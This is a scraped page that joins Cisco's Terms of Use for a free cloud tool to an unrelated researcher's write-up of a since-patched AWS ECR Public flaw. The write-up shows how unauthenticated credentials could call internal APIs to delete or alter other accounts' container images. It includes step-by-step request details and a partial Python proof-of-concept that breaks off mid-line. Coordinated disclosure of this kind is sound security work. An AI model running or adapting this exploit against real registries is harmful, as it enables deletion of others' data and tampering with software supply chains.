These Cisco Terms of Use (this “Agreement”) between You and Cisco cover Your use of the Software and Cloud Services (“Cisco Technology”) obtained through this site. The Cisco Technology is intended for use by business users. Definitions of capitalized terms are in Section 11.
You agree to be bound by the terms of this Agreement through (a) Your download, installation, or use of the Cisco Technology; or (b) Your express agreement to this Agreement. If You do not have authority to enter into this Agreement or You do not agree with its terms, do not use the Cisco Technology.
Section 2. Using Cisco Technology
2.1 License and Right to Use. Cisco grants You, for Your direct benefit during the Usage Term and for the full scope of Your Entitlement under this Agreement, a non-exclusive, non-transferable (except with respect to Software as permitted under the Cisco Software Transfer and Re-Use Policy) (a) license to use the Software; and (b) right to use the Cloud Services (collectively, the “Usage Rights”).
2.2 Use by Third Parties. You may permit Authorized Third Parties to exercise the Usage Rights on Your behalf, provided that You are responsible for (a) ensuring that such Authorized Third Parties comply with this Agreement; and (b) any breach of this Agreement by such Authorized Third Parties.
2.3 Free Service. Cisco is making this Cisco Technology available to You without charge, up to certain capacity limits as described in Section 10 below, and subject to the terms of this Agreement. You agree that Cisco, in its sole discretion and for any or no reason, may terminate Your Usage Rights (or any part thereof) and that any termination may be without prior notice and without liability to Cisco. Cisco may, for example, suspend or terminate Your Usage Rights if (i) Cisco has reason to believe that You engaged in any fraudulent behaviour as it relates to the Cloud Services, or (ii) You use Cisco Technology beyond Your Entitlement. You are solely responsible for exporting Your customer data from the Cisco Technology prior to termination, and, except as required by law, Cisco will provide You a reasonable opportunity to retrieve such data.
2.4 Upgrades or Additional Copies of Software. You may only use Upgrades or additional copies of the Software beyond Your Entitlement if You have (a) acquired those rights under a support agreement covering the applicable Software; or (b) You have purchased the right to use Upgrades or additional copies separately.
2.5 Interoperability of Software. If required by law and upon Your request, Cisco will provide You with the information needed to achieve interoperability between the Software and another independently created program, provided You agree to any additional terms reasonably required by Cisco. You will treat such information as Confidential Information.
Section 3. Additional Conditions of Use
3.1 Cisco Technology Generally. Unless expressly agreed by Cisco, You may not (a) transfer, sell, sublicense, monetize, or make the functionality of any Cisco Technology available to any third party; (b) use the Software on second hand or refurbished Cisco equipment not authorized by Cisco, or use Software that is licensed for a specific device on a different device (except as permitted under Cisco’s Software License Portability Policy); (c) remove, modify, or conceal any product identification, copyright, proprietary, intellectual property notices or other marks; (d) reverse engineer, decompile, decrypt, disassemble, modify, or make derivative works of the Cisco Technology; or (e) use Cisco Content other than as part of Your permitted use of the Cisco Technology.
3.2 Cloud Services. You will not intentionally (a) interfere with other users’ access to, or use of, the Cloud Service, or with its security; (b) facilitate the attack or disruption of the Cloud Service, including a denial of service attack, unauthorized access, penetration testing, crawling, or distribution of malware (including viruses, trojan horses, worms, time bombs, spyware, adware, and cancelbots); (c) cause an unusual spike or increase in Your use of the Cloud Service that negatively impacts the Cloud Service’s operation; or (d) submit any information that is not contemplated in the applicable Documentation.
3.3 Evolving Cisco Technology. Cisco may: (a) enhance or modify the features, functionality, and capacity limits of this Cisco Technology at any time, in its sole discretion, without liability; and (b) perform scheduled maintenance of the infrastructure and software used to provide the Cloud Service, during which time You may experience some disruption to that Cloud Service. Whenever reasonably practicable, Cisco will provide You with advance notice of such maintenance. You acknowledge that, from time to time, Cisco may need to perform emergency maintenance without providing You advance notice, during which time Cisco may temporarily suspend Your access to, and use of, the Cloud Service.
Cisco reserves the right (a) to end the life of this Cisco Technology, including component functionality, (“EOL”), and/or (b) to incorporate all or some of the features and functionality of this Cisco Technology into a Cisco paid offer at any time, in its sole discretion, and without liability (“Cisco Offering”). Any new Cisco Offering will be subject to its own terms and conditions.
3.4 Protecting Account Access. You will keep all account information up to date, use reasonable means to protect Your account information, passwords and other login credentials, and promptly notify Cisco of any known or suspected unauthorized use of or access to Your account.
3.5 Use with Third-Party Products. If You use the Cisco Technology together with third-party products, such use is at Your risk. You are responsible for complying with any third-party provider terms, including its privacy policy. Cisco does not provide support or guarantee ongoing integration support for products that are not a native part of the Cisco Technology.
3.6 Open Source Software. Open source software not owned by Cisco is subject to separate license terms as set out at www.cisco.com/go/opensource. The applicable open source software licences will not materially or adversely affect Your ability to exercise Usage Rights in applicable Cisco Technology.
Section 4. Confidential Information and Use of Data
4.1 Confidentiality. Recipient will hold in confidence and use no less than reasonable care to avoid disclosure of any Confidential Information to any third party, except for its employees, affiliates, and contractors who have a need to know (“Permitted Recipients”). Recipient: (a) must ensure that its Permitted Recipients are subject to written confidentiality obligations no less restrictive than the Recipient’s obligations under this Agreement, and (b) is liable for any breach of this Section by its Permitted Recipients. Such nondisclosure obligations will not apply to information that: (i) is known by Recipient without confidentiality obligations; (ii) is or has become public knowledge through no fault of Recipient; or (iii) is independently developed by Recipient. Recipient may disclose Discloser’s Confidential Information if required under a regulation, law or court order provided that Recipient provides prior notice to Discloser (to the extent legally permissible) and reasonably cooperates, at Discloser’s expense, regarding protective actions pursued by Discloser. Upon the reasonable request of Discloser, Recipient will either return, delete or destroy all Confidential Information of Discloser and certify the same.
4.2 How We Use Data. Cisco will access, process and use data in connection with Your use of the Cisco Technology in accordance with applicable privacy and data protection laws. For further detail, please visit Cisco’s Security and Trust Center.
4.3 Notice and Consent. To the extent Your use of the Cisco Technology requires it, You are responsible for providing notice to, and obtaining consents from, individuals regarding the collection, processing, transfer and storage of their data through Your use of the Cisco Technology.
Section 5. Ownership
Except where agreed in writing, nothing in this Agreement transfers ownership in, or grants any license to, any intellectual property rights. You retain any ownership of Your content and Cisco retains ownership of the Cisco Technology and Cisco Content. You acknowledge and agree that any questions, comments, suggestions, ideas, feedback or other information about this Cisco Technology provided by You to Cisco (“Feedback”) are non-confidential and Cisco may use any Feedback You provide in connection with Your use of the Cisco Technology as part of its business operations without acknowledgment or compensation to You.
Section 6. Warranties and Representations
To the extent allowed by applicable law, Cisco expressly disclaims all warranties and conditions of any kind, express or implied, including without limitation any warranty, condition or other implied term as to merchantability, fitness for a particular purpose or non-infringement, or that the Cisco Technology will be secure, uninterrupted or error free. If You are a consumer, You may have legal rights in Your country of residence that prohibit the limitations set out in this Section from applying to You, and, where prohibited, they will not apply
Section 7. Liability
Neither party will be liable for indirect, incidental, exemplary, special, or consequential damages; loss or corruption of data or interruption or loss of business; or loss of revenues, profits, goodwill, or anticipated sales or savings. The maximum aggregate liability of each party under this Agreement is limited to $5,000 USD. These limitations of liability do NOT apply to liability arising from (a) Your breach of Sections 2.1 (License and Right to Use), 3.1 (Cisco Technology Generally), 3.2 (Cloud Services) or 9.7 (Export). These limitations of liability apply whether the claims are in warranty, contract, tort (including negligence), infringement, or otherwise, even if either party has been advised of the possibility of such damages. Nothing in this Agreement limits or excludes any liability that cannot be limited or excluded under applicable law. These limitations of liability are cumulative and not per incident.
Section 8. Termination and Suspension
8.1 Suspension. Cisco may immediately suspend Your Usage Rights if You breach Sections 2.1 (License and Right to Use), 3.1 (Cisco Technology Generally), 3.2 (Cloud Services) or 9.7 (Export).
8.2 Termination. Cisco, in its sole discretion and for any or no reason, may terminate Your access to this Cisco Technology or any part thereof and any termination may be without prior notice and without liability to Cisco. Cisco may, for example, suspend or terminate Your access immediately if You breach Sections 2.1 (License and Right to Use), 3.1 (Cisco Technology Generally), 3.2 (Cloud Services), or 9.7 (Export). Upon termination of this Agreement, You must stop using the Cisco Technology and destroy any copies of Software and Confidential Information within Your control.
Section 9. General Provisions
9.1 Survival. Sections 4 (Confidential Information and Use of Data), 5 (Ownership), 7 (Liability), 8 (Termination and Suspension), and 9 (General Provisions) survive termination or expiration of this Agreement.
9.2 Third-Party Beneficiaries. This Agreement does not grant any right or cause of action to any third party.
9.3 Assignment and Subcontracting. Except as set out below, neither party may assign or novate this Agreement in whole or in part without the other party’s express written consent. Cisco may (a) by written notice to You, assign or novate this Agreement in whole or in part to an Affiliate of Cisco, or otherwise as part of a sale or transfer of any part of its business; or (b) subcontract any performance associated with the Cisco Technology to third parties, provided that such subcontract does not relieve Cisco of any of its obligations under this Agreement.
9.4 U.S. Government End Users. The Software, Cloud Services and Documentation are deemed to be “commercial computer software” and “commercial computer software documentation” pursuant to FAR 12.212 and DFARS 227.7202. All U.S. Government end users acquire the Cisco Technology and Documentation with only those rights set forth in this Agreement. Any provisions that are inconsistent with federal procurement regulations are not enforceable against the U.S. Government
9.5 Modifications to this Agreement. Cisco may change this Agreement or any of its components by updating it on Cisco.com and/or the Documentation page, which can be found at https://community.cisco.com/. Cisco will exercise commercially reasonable efforts to provide notice of any material changes to this Agreement, and within three (3) business days of posting changes to this Agreement, they will be binding. If you do not agree with the changes, you must discontinue using the Cisco Technology at that time. If you continue using the Cisco Technology after that time, you will be deemed to have accepted the changes to this Agreement.
9.6 Compliance with Laws. Each party will comply with all laws and regulations applicable to their respective obligations under this Agreement. Cisco may restrict the availability of the Cisco Technology in any particular location or modify or discontinue features to comply with applicable laws and regulations.
If You use the Cisco Technology in a location with local laws requiring a designated entity to be responsible for collection of data about individual end users and transfer of data outside of that jurisdiction (e.g., Russia and China), You acknowledge that You are the entity responsible for complying with such laws.
9.7 Export. Cisco’s Software, Cloud Services, products, technology, and services (collectively the “Cisco Products”) are subject to U.S. and local export control and sanctions laws. You acknowledge and agree to the applicability of and Your compliance with those laws, and You will not receive, use, transfer, export, or re-export any Cisco Products in a way that would cause Cisco to violate those laws. You also agree to obtain any required licenses or authorizations
9.8 Governing Law and Venue. This Agreement, and any disputes arising from it, will be governed exclusively by the applicable governing law below, based on Your primary place of business (or primary residence, if you are not a business) and without regard to conflicts of laws rules or the United Nations Convention on the International Sale of Goods. The courts located in the applicable venue below will have exclusive jurisdiction to adjudicate any dispute arising out of or relating to the Agreement or its formation, interpretation or enforcement. Each party hereby consents and submits to the exclusive jurisdiction of such courts. Regardless of the below governing law, either party may seek interim injunctive relief in any court of appropriate jurisdiction with respect to any alleged breach of Cisco’s intellectual property or proprietary rights
Your Primary Place of Business Governing Law Jurisdiction and Venue
Any location not specified below
| State of California, United States of America | Superior Court of California, County of Santa Clara and Federal Courts of the Northern District of California
| Australia | Laws of the State of New South Wales, Australia | State and Federal Courts of New South Wales |
| Canada | Province of Ontario, Canada | Courts of the Province of Ontario |
| China | Laws of the People’s Republic of China | Hong Kong International Arbitration Center |
| Europe (excluding Italy), Middle East, Africa, Asia (excluding Japan and China), Oceania (excluding Australia) | Laws of England | English Courts |
| Italy | Laws of Italy | Court of Milan |
| Japan | Laws of Japan | Tokyo District Court of Japan |
| United States, Latin America or the Caribbean | State of California, United States of America | Superior Court of California, County of Santa Clara and Federal Courts of the Northern District of California |
If You are a United States public sector agency or government institution located in the United States, the laws of the primary jurisdiction in which You are located will govern this Agreement and any disputes arising from it. For U.S. Federal Government users, this Agreement will be controlled and construed under the laws of the United States of America.
9.9 Notice. Any notice delivered by Cisco to You under this Agreement will be delivered on Cisco.com. Notices to Cisco should be sent to Cisco Systems, Inc., Office of General Counsel, 170 West Tasman Drive, San Jose, CA 95134.
9.10 Force Majeure. Neither party will be responsible for failure to perform its obligations due to an event or circumstances beyond its reasonable control.
9.11 No Waiver. Failure by either party to enforce any right under this Agreement will not waive that right.
9.12 Severability. If any portion of this Agreement is not enforceable, it will not affect any other terms.
9.13 Entire agreement. This Agreement is the complete agreement between the parties with respect to the subject matter of this Agreement and supersedes all prior or contemporaneous communications, understandings or agreements (whether written or oral).
9.14 Translations. Cisco may provide local language translations of this Agreement in some locations. You agree that those translations are provided for informational purposes only and if there is any inconsistency, the English version of this Agreement will prevail.
9.15 Order of Precedence. If there is any conflict between this Agreement and any Cisco policies expressly referenced in this Agreement, the order of precedence is: (a) this Agreement; then (b) any applicable Cisco policy expressly referenced in this Agreement.
9.16 Language Election for Purchasers in Quebec. You confirm Your Agreement that this Cisco Technology is currently provided in English only.
Section 10. Additional Terms
10.1 Restrictions on Use by Minor Children. This Cisco Technology is not intended for use by persons younger than the age of consent in their relevant jurisdiction (e.g.,13 years old in the United States under the US Children’s Online Privacy Protection Act of 1998, or 16 or 13 years old in the European Union as per Member State law) (“Minor Children”). Minor Children are not permitted to create an account and You will not authorize Minor Children to access the Cisco Technology.
10.2 Capacity Restrictions. Your right to access and use this Cisco Technology is currently limited to five (5) nodes dedicated to applications/microservices.
10.3 Limited Community Support. This Cisco Technology is provided on a free-of-charge basis, as-is, and without support. Cisco has no obligation to maintain, repair, or upgrade this Cloud Service and Cisco will not provide user support services in connection with this Cisco Technology. User can refer to self-service help materials that cover a range of topics or reach out to our community forum to engage in community support discussions on our Documentation page at https://community.cisco.com/. Cisco makes no representations about and has no liability for these community support resources. All use of these resources, and the advice and guidance therein, is at Your own risk.
10.4 No Competitive Analysis. By agreeing to these terms, You represent and warrant that you will not use this Cisco Technology or its Documentation to (a) copy ideas, features, functions, or graphics; (b) develop competing products or services; or (c) perform competitive analyses.
10.5 Beta Functionality. User acknowledges and agrees that all or some components or functionality of the Cisco Technology may be in beta stage and may not have been (and may not become) productized or commercialized. You acknowledge that Your use and evaluation of this Cisco Technology is at Your own risk.
Section 11. Definitions
“Affiliate” means any corporation or company that directly or indirectly controls, or is controlled by, or is under common control with the relevant party, where “control” means to: (a) own more than 50% of the relevant party; or (b) be able to direct the affairs of the relevant party through any lawful means (e.g., a contract that allows control).
“Authorized Third Parties” means Your Users, Your Affiliates, Your third-party service providers, and each of their respective Users, permitted to access and use the Cisco Technology on Your behalf as part of Your Entitlement.
“Cisco” “we” “our” or “us” means Cisco Systems, Inc. or its applicable Affiliate(s).
“Cisco Content” means any (a) content or data provided by Cisco to You as part of Your use of the Cisco Technology and (b) content or data that the Cisco Technology generates or derives in connection with Your use. Cisco Content includes geographic and domain information, rules, signatures, threat intelligence, and data feeds, and Cisco’s compilation of suspicious URLs.
“Cloud Service” means the Cisco hosted software-as-a-service offering or other Cisco cloud-enabled feature described in this Agreement. Cloud Services include applicable Documentation and may also include Software.
“Confidential Information” means non-public proprietary information of the disclosing party (“Discloser”) obtained by the receiving party (“Recipient”) in connection with this Agreement, which is (a) conspicuously marked as confidential or, if verbally disclosed, is summarized in writing to the Recipient within a reasonable time period after disclosure and marked as confidential; or (b) is information which by its nature should reasonably be considered confidential whether disclosed in writing or verbally.
“Delivery Date” means the date on which the Cloud Service is made available for Your use or, when Usage Rights in Software and Cloud Services are granted together, the earlier of the date Software is made available for download, or the date on which the Cloud Service is made available for Your use.
“Documentation” means the technical specifications and usage materials officially published by Cisco or available on https://community.cisco.com/ specifying the functionalities and capabilities of the applicable Cisco Technology.
“Entitlement” means the specific metrics, duration, and quantity of Cisco Technology that You acquire from Cisco under this Agreement.
“Software” means the Cisco computer programs including Upgrades, firmware and applicable Documentation.
“Upgrades” means all updates, upgrades, bug fixes, error corrections, enhancements and other modifications to the Software.
“Usage Term” means the period commencing on the Delivery Date and continuing until expiration or termination of the Entitlement, during which period You have the right to use the applicable Cisco Technology.
“User” means the individuals (including contractors or employees) permitted to access and use the Cisco Technology on Your behalf as part of Your Entitlement.
“You” means the individual or legal entity using the Cisco Technology.
NEW Cloud Security Academy Level up your skills with hands-on lessons. Get started
I discovered a critical AWS Elastic Container Registry Public (ECR Public) vulnerability that allowed external actors to delete, update, and create ECR Public images, layers, and tags in registries and repositories that belong to other AWS Accounts, by abusing undocumented internal ECR Public API actions. Prior to mitigation, this vulnerability could have potentially led to denial of service, data exfiltration, lateral movement, privilege escalation, data destruction, and other multi-variate attack paths that are only limited by the craftiness and goals of the adversary.
By exploiting this vulnerability, a malicious actor could delete all images in the Amazon ECR Public Gallery or update the image contents to inject malicious code. This malicious code is executed on any machine that pulls and runs the image, whether on user’s local machines, Kubernetes clusters or cloud environments. Using this vulnerability an attacker could infect popular images such as CloudWatch agent, Datadog agent, EKS Distro, Amazon Linux and Nginx, all while abusing the trust model of ECR Public as these images would masquerade as being verified and thus undermine the ECR Public supply chain. The top Six most popular (by downloads) images on the ECR Public Gallery combine for around 13 billion downloads and there are several thousands more images stored on ECR Public.
This vulnerability was reported to AWS Security Outreach Team, who immediately responded and worked with the ECR Public team to fix the vulnerability in less than twenty-four hours. AWS has conducted an analysis of the logs and confirmed that the only activity they identified related to the issue was between my research accounts. No customer action is required to remediate the issue.
Nov 15, 2022: The vulnerability was reported to AWS Security. AWS Security Outreach and ECR Public teams validated the vulnerability and started to deploy the fix.
Nov 16, 2022: The fix was successfully deployed.
Dec 13, 2022: Coordinated disclosure with AWS.
Explore Amazon ECR Public Gallery
The Amazon ECR Public Gallery is a public portal that lists all public repositories hosted on the Amazon ECR Public service. Popular companies, projects, and services, such as NGINX, Ubuntu, Amazon Linux, and HashiCorp Consul, publish their images in the gallery for public consumption and usage.
Each AWS account is provided with a default Amazon ECR Public Registry that comes with a unique default alias. AWS allows customers to set a custom alias for their Registry to create a meaningful public registry name. For example, in my account, the Amazon ECR Public registry default alias is w8r5q5v0 and I assigned a custom alias of gafresearch as shown in the screenshot below.
Any ECR Public Repository created in the AWS Account is assigned to the Account’s default Amazon ECR Public Registry. Whenever a new ECR Public Repository is created, it is automatically mirrored on the Amazon ECR Public Gallery web application with all its details. I decided to create a new public repository, “gafpubrep”, with a simple Docker Image to better understand how exactly it is presented in the Amazon ECR Public Gallery. My repository URI is public.ecr.aws/w8r5q5v0/gafpubrep, and I have pushed an image with a “latest” tag to it as shown in the screenshot below.
When accessing the Repository “gafpubrep” in the Amazon ECR Public Gallery, the following HTTP POST request is sent in the background as shown in the screenshot below.
Note that the value of the X-Amz-Target HTTP header is SpencerFrontendService.DescribeImageTagsInternal. ECR Public has the DescribeImageTags API action available, but the “Internal” suffix is odd since the endpoint itself is not internal. Also, the SpencerFrontendService service is unfamiliar and doesn’t have Google results or public mentions likely denoting an internal AWS service or an old codename for the ECR Public Service. Additionally, SpencerFrontendService is referenced again in the X-Amz-TargetHTTP header for requests coming out of the Amazon ECR console. The request is also authenticated using AWS SigV4 and temporary credentials, which are probability not my AWS Console credentials as Amazon ECR Public Gallery application does not request login.
I searched for more Internal actions in the Amazon ECR Public Gallery main JavaScript file and found 12 actions with the Internal suffix. For each action, I searched for a matching API action both in the ECR and ECR Public API documentation. The table below shows the results of this mapping.
Since Amazon ECR Public Gallery presents only public repository details, I would expect to see only ECR Public API actions, but that was not the case. The Internal actions include 3 ECR Public actions, 2 ECR actions and 7 additional publicly undocumented actions. To better understand these actions, I mapped their triggers to understand what prompts the actions to occur. Simply, I captured which operations in the Amazon ECR Public Gallery UI, Amazon ECR console, or Docker CLI commands causes them. The table below shows the results of this experiment.
When setting a custom alias for the Amazon ECR Public registry in the AWS ECR console (requires login)
From the table above, ECR Public API actions are triggered from the Amazon ECR Public Gallery application to get the public repositories’ details. The two ECR API actions, BatchGetImageInternal and GetDownloadUrlForLayerInternal, are triggered by the Docker client to support the public pull operation. The undocumented API action PutRegistryAliasInternal is triggered when a request for a custom registry alias is set in the AWS ECR console. We were then left with 4 undocumented Internal API actions for which I couldn’t find their triggers: DeleteImageForConvergentReplicationInternal, DeleteTagForConvergentReplicationInternal, PutImageForConvergentReplicationInternal and PutLayerForConvergentReplicationInternal.
The diagram below summarizes all the observed interactions with the ECR Public internal API.
The diagram includes all 3 optional triggers for the Internal ECR Public API: Docker client, AWS ECR console, and Amazon ECR Public Gallery UI. The same observed flow with the Docker client can trigger the BatchGetImageInternal action using the docker manifest inspect command.
Activating the Undocumented Internal Actions
I wanted to manually invoke Internal actions for two main reasons:
To manipulate the request, test it, and tamper with its parameters.
To invoke the four undocumented actions for which I didn’t find their triggers.
Regarding the four undocumented actions, those actions are the most interesting because they are not “read only” and would (potentially) allow me to Put or Delete images from ECR Public Registries and their associated Repositories, which I do not own.
I started with the DescribeImageTagsactions because I already know its request structure. I first tried to send the request without any authentication and received a "Missing Authentication Token" error. Then, I tried to use my AWS credentials to sign the request and received an “Access Denied” error instead as shown in the screenshot below.
I realized that I must intercept and use the specific identity credentials which are also used by the Amazon ECR Public Gallery as part of the original SigV4 flow observed earlier.
Amazon ECR Public Gallery Authentication
Back to the credentials from the SigV4 signed request, let’s try to find who they belong to and what they can do. During the research on the Internal API actions, I recognized that all requests from the Amazon ECR Public Gallery application are authenticated. The X-Amz-Security-Token header implies that those are temporary credentials of some AWS IAM Role. I searched for the AccessKeyId value to locate the originating request that accepted those temporary credentials. The request I observed is shown in the screenshot below.
This is a request to Amazon CognitoGetCredentialsForIdentity API action to obtain temporary, limited-privilege credentials to access other AWS services. Cognito is an AWS service that provides authentication, authorization, and user management to web, mobile and specific AWS services and applications. Note that the GetCredentialsForIdentity action is a public API, and no credentials are needed to call this API. You can read more specifics about Amazon Cognito identity pools authentication flow here.
I can use those temporary credentials to sign requests to other AWS services’ APIs, including Cognito and ECR Public. I then attempted to use the identity’s temporary credentials to access another Amazon Cognito API, DescribeIdentity as demonstrated in the screenshot below.
From the error above you can see that the temporary credentials belong to the SpencerPortalCognitoInfra-SpencerCognitoUnAuthRole-103M4HZ3UDLSZAWS IAM role, located in an internal AWS Account with the identifier of 421354852932, likely used to host a part of the ECR Public internal services.
Below is a diagram that theoretically demonstrates how I believe the Amazon ECR Public Gallery UI obtains temporary credentials for the SpencerPortalCognitoInfra-SpencerCognitoUnAuthRole role to authenticate and authorize requests to ECR Public internal APIs.
Now that I know how to authenticate against the ECR Public internal API using SpencerPortalCognitoInfra identity, I can invoke the DescribeImageTags action from before. The screenshot below demonstrates the successful API request.
Now that I have successfully invoked one of the Internal actions, I can use a similar technique to invoke the others, focusing on those which would allow me to Put or Delete images from ECR Public Registries and their associated Repositories, which I do not own.
Exploit Proof of Concept: Deleting Image Tags
In this Proof of Concept (POC) I will focus on the DeleteTagForConvergentReplicationInternal API action, but this POC’s approach can be executed against the DeleteImageForConvergentReplicationInternal, PutImageForConvergentReplicationInternal, PutLayerForConvergentReplicationInternal and all other API actions.
Since the DeleteTagForConvergentReplicationInternal action is undocumented, I need to discover the request structure. When I try to send the request with an empty body, I get an error specifying that the “imageTagEntity” parameter is required as shown in the screenshot below.
I went back to the Amazon ECR Public Gallery main JavaScript file and searched for the “DeleteTagForConvergentReplicationInternal” string. This led me to a JSON structure that describes the expected input and output of the action. The image below highlights this structure.
The input is indeed the “imageTagEntity” object that has a structure of shape “S2j”. The image below shows the structure of shape “S2j” which contains the entityId, repositoryEntityId, imageManifestEntityId, tag, createdAt, updatedAt, and deletedAt fields.
Note that all fields are atomic types and not structures. Their type is string (empty means string) or timestamp. In other structures there were also int (integer) or long types as well. Finding the fields’ values required trial and error along with combining values from other actions results. Finally, I had the full flow to obtain all required details. Let’s use my test public repository, https://gallery.ecr.aws/w8r5q5v0/gafpubrep, that has the sample image with the “latest” tag public.ecr.aws/w8r5q5v0/gafpubrep:latest as an example.
entityId – A random UUID V4.
tag – The tag name we would like to delete – in my example it’s “latest”.
repositoryEntityId and imageManifestEntityId – To get these values we need to use the GetDownloadUrlForLayerInternal action. This action returns a URL from where you can download the layer’s content. If we request the download URL of the manifest, the returned URL will include the UUIDs both of repositoryEntityId and imageManifestEntityId. But, to request the download URL of the manifest, we need to know its digest. We can get the manifest’s digest from BatchGetImageInternal response. But, BatchGetImageInternal requires the image digest, which we can get from DescribeImageTagsInternal response. Putting it all together, here is the flow.
1. Send request to DescribeImageTagsInternal – Use the target registry alias and repository name to set the values of registryAliasName and repositoryName parameters respectively as shown below.
2. Save the values of imageDigest and createdAt for next steps. 3. Send request to BatchGetImageInternal – Use the registry alias, repository name, image tag, and imageDigest from before to set the values of registryAliasName, repositoryName, imageTag, and imageDigest parameters respectively.
4. Save the manifest’s digest value from the response at images[0].imageManifest.config.digest (parse imageManifest as JSON). 5. Send request toGetDownloadUrlForLayerInternal – Use the registry alias, repository name, and the manifest’s digest from before to set the values of registryAliasName, repositoryName, and layerDigest parameters respectively.
6. Extract the UUIDs of repositoryEntityId and imageManifestEntityId from the downloadUrl in the response: https://xxxx.cloudfront.net/xxxxxx-<account_id>-<repositoryEntityId>/<imageManifestEntityId>?...
createdAt, updatedAt and deletedAt – Use the createdAt value saved from the DescribeImageTagsInternal response.
Now that we have the full request body, we can send the request to the DeleteTagForConvergentReplicationInternal API action as shown below.
When we refresh the gafpubrep repository page https://gallery.ecr.aws/w8r5q5v0/gafpubrep in the Amazon ECR Public Gallery, we can see that all images were deleted as shown in the screenshot below.
Also, when I login to my personal AWS ECR console, I can see that the tags were also removed there as shown in the screenshot below.
The Python script provided below executes all steps described above to activate the DeleteTagForConvergentReplicationInternal API action.import datetime import hashlib import hmac import sys import json import re import uuid import requests import boto3 # Set this value to the target registry alias registry_alias_name = 'w8r5q5v0' # Set this value to the target repository name repository_name = 'gafpubrep' DESCRIBE_REPOSITORY_CATALOG_DATA = 'SpencerFrontendService.DescribeRepositoryCatalogDataInternal' DESCRIBE_IMAGE_TAGS = 'SpencerFrontendService.DescribeImageTagsInternal' BATCH_GET_IMAGE = 'SpencerFrontendService.BatchGetImageInternal' GET_DOWNLOAD_URL_FOR_LAYER = 'SpencerFrontendService.GetDownloadUrlForLayerInternal' DELETE_TAG_FOR_CONVERGENT_REPLICATION = 'SpencerFrontendService.DeleteTagForConvergentReplicationInternal' access_key_id = '' secret_key = '' session_token = '' def init_spencer_creds(): """ Uses Amazon Cognito GetCredentialsForIdentity to get temporary credentials for SpencerPortalCognitoInfra-SpencerCognitoUnAuthRole Role. I'm using GetCredentialsForIdentity with an IdentityId I have already issued so as not to overflow the IdentityPool with new GetId each time. :return: temporary credentials for SpencerPortalCognitoInfra- SpencerCognitoUnAuthRole Role. """ client = boto3.client('cognito-identity') response = client.get_credentials_for_identity( IdentityId='us-east-1:4efdd100-5f28-4444-9dc6-8b201cfef87a' ) if not response["Credentials"]: print("Error while getting temporary credentials.") sys.exit(1) global access_key_id, secret_key, session_token access_key_id = response["Credentials"]["AccessKeyId"] secret_key = response["Credentials"]["SecretKey"] session_token = response["Credentials"]["SessionToken"] def sign(key, msg): return hmac.new(key, msg.encode("utf-8"), hashlib.sha256).digest() def getSignatureKey(key, date_stamp, regionName, serviceName): kDate = sign(('AWS4' + key).encode('utf-8'), date_stamp) kRegion = sign(kDate, regionName) kService = sign(kRegion, serviceName) kSigning = sign(kService, 'aws4_request') return kSigning def send_request(request_parameters, amz_target): method = 'POST' service = 'ecr-public' host = 'ecr-public.us-east-1.amazonaws.com' region = 'us-east-1' endpoint = 'https://ecr-public.us-east-1.amazonaws.com' content_type = 'application/x-amz-json-1.1' t = datetime.datetime.utcnow() amz_date = t.strftime('%Y%m%dT%H%M%SZ') date_stamp = t.strftime('%Y%m%d') canonical_uri = '/' canonical_querystring = '' canonical_headers = 'content-type:' + content_type + '\n' + 'host:' + host + '\n' + 'x-amz-date:' + amz_date + '\n' + 'x-amz-target:' + amz_target + '\n' signed_headers = 'content-type;host;x-amz-date;x-amz-target' payload_hash = hashlib.sha256(request_parameters.encode('utf-8')).hexdigest() # Create canonical request canonical_request = method + '\n' + canonical_uri + '\n' + canonical_querystring + '\n' + canonical_headers + '\n' + signed_headers + '\n' + payload_hash # Create string to sign algorithm = 'AWS4-HMAC-SHA256' credential_scope = date_stamp + '/' + region + '/' + service + '/' + 'aws4_request' string_to_sign = algorithm + '\n' + amz_date + '\n' + credential_scope + '\n' + hashlib.sha256( canonical_request.encode('utf-8')).hexdigest() signing_key = getSignatureKey(secret_key, date_stamp, region, service) signature = hmac.new(signing_key, (string_to_sign).encode('utf-8'), hashlib.sha256).hexdigest() authorization_header = algorithm + ' ' + 'Credential=' + access_key_id + '/' + credential_scope + ', ' + 'SignedHeaders=' + signed_headers + ', ' + 'Signature=' + signature headers = {'Content-Type': content_type, 'X-Amz-Date': amz_date, 'X-Amz-Target': amz_target, 'X-Amz-Security-Token': session_token, 'Authorization': authorization_header} response = requests.post(endpoint, data=request_parameters, headers=headers) return response.json() def describe_repository_catalog_data(registry_alias_name): request_parameters = '{"' \ f'registryAliasName": "{registry_alias_name}"' \ '}' return send_request(request_parameters, amz_target=DESCRIBE_REPOSITORY_CATALOG_DATA) def describe_image_tags(registry_alias_name, repository_name): request_parameters = '{"' \ f'registryAliasName": "{registry_alias_name}", ' \ f'"repositoryName": "{repository_name}"' \ '}' return send_request(request_parameters, amz_target=DESCRIBE_IMAGE_TAGS) def batch_get_image(registry_alias_name, repository_name, image_digest, image_tag): request_parameters = '{"' \ f'registryAliasName": "{registry_alias_name}", ' \ f'"repositoryName": "{repository_name}", ' \ '"imageIds": [{' \ f'"imageDigest":"{image_digest}", ' \ f'"imageTag":"{image_tag}"' \ '}]' \ '}' return send_request(request_parameters, amz_target=BATCH_GET_IMAGE) def get_download_url_for_layer(registry_alias_name, repository_name, layer_digest): request_parameters = '{"' \ f'registryAliasName": "{registry_alias_name}", ' \ f'"repositoryName": "{repository_name}", ' \ f'"layerDigest":"{layer_digest}"' \ '}' return send_request(request_parameters, amz_target=GET_DOWNLOAD_URL_FOR_LAYER) def delete_tag_for_convergent_replication(repository_entity_id, image_manifest_entity_id, tag, created_at, updated_at, deleted_at): random_uuid = uuid.uuid4() request_parameters = '{' \ '"imageTagEntity": {' \ f'\"entityId\":\"{random_uuid}\", ' \ f'\"repositoryEntityId\":\"{repository_entity_id}\", ' \ f'\"imageManifestEntityId\":\"{image_manifest_entity_id}\", ' \ f'\"tag\":\"{tag}\", ' \ f'\"createdAt\":{created_at}, ' \ f'\"updatedAt\":{updated_at}, ' \ f'\"deletedAt\":{deleted_at}' \ '}' \ '}' return send_request(request_parameters, amz_target=DELETE_TAG_FOR_CONVERGENT_REPLICATION) def get_repositories(registry_alias_name): response = describe_repository_catalog_data(registry_alias_name) repositories_list = [] for r in response["repositories"]: repositories_list.append(r["repositoryName"]) return repositories_list def get_image_tags_details(registry_alias_name, repository_name): response = describe_image_tags(registry_alias_name, repository_name) return response["imageTagDetails"] def delete_tag(registry_alias_name, repository_name, image_digest, image_tag, image_created_at): response = batch_get_image(registry_alias_name, repository_name, image_digest, image_tag) image_manifest = 